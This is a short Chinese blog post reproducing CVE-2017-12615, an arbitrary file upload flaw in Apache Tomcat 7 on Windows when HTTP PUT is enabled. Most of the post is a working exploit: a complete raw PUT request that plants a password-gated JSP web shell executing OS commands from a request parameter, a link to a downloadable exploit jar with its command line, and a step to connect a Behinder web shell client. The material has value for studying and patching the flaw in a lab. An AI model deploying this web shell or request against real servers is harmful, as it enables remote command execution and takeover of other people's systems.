Tomcat PUT方法任意文件上传(CVE-2017-12615)

目录

漏洞复现:

漏洞利用工具:


漏洞环境当 Tomcat运行在Windows操作系统,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求上传任意文件,包括JSP类型的木马。
影响范围Apache Tomcat 7.0.0 - 7.0.81

漏洞复现:

Tomcat版本:Tomcat 7.0.39

打开Tomcat安装目录的 conf\web.xml ,添加如下配置。在Tomcat7.0版本下默认配置是开启readonly的,需要手动配置readonly为false才可以进行漏洞利用。

抓包,修改方式为OPTIONS,发现允许PUT方法

将数据包修改为如下,点击 Go (我们可以将PUT的内容修改为其他类型的JSP木马)

PUT /test.jsp/ HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 423

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

访问网站根目录下的test.jsp

漏洞利用工具:

https://download.csdn.net/download/qq_36119192/11665567

java -jar CVE-2017-12615-Exploit.jar http://127.0.0.1:8080/ test.jsp 木马文件的路径

然后,用冰蝎连接 http://127.0.0.1:8080/test.jsp 即可。

posted @ 2019-09-04 16:35  墨鱼菜鸡  阅读(2325)  评论(0编辑  收藏  举报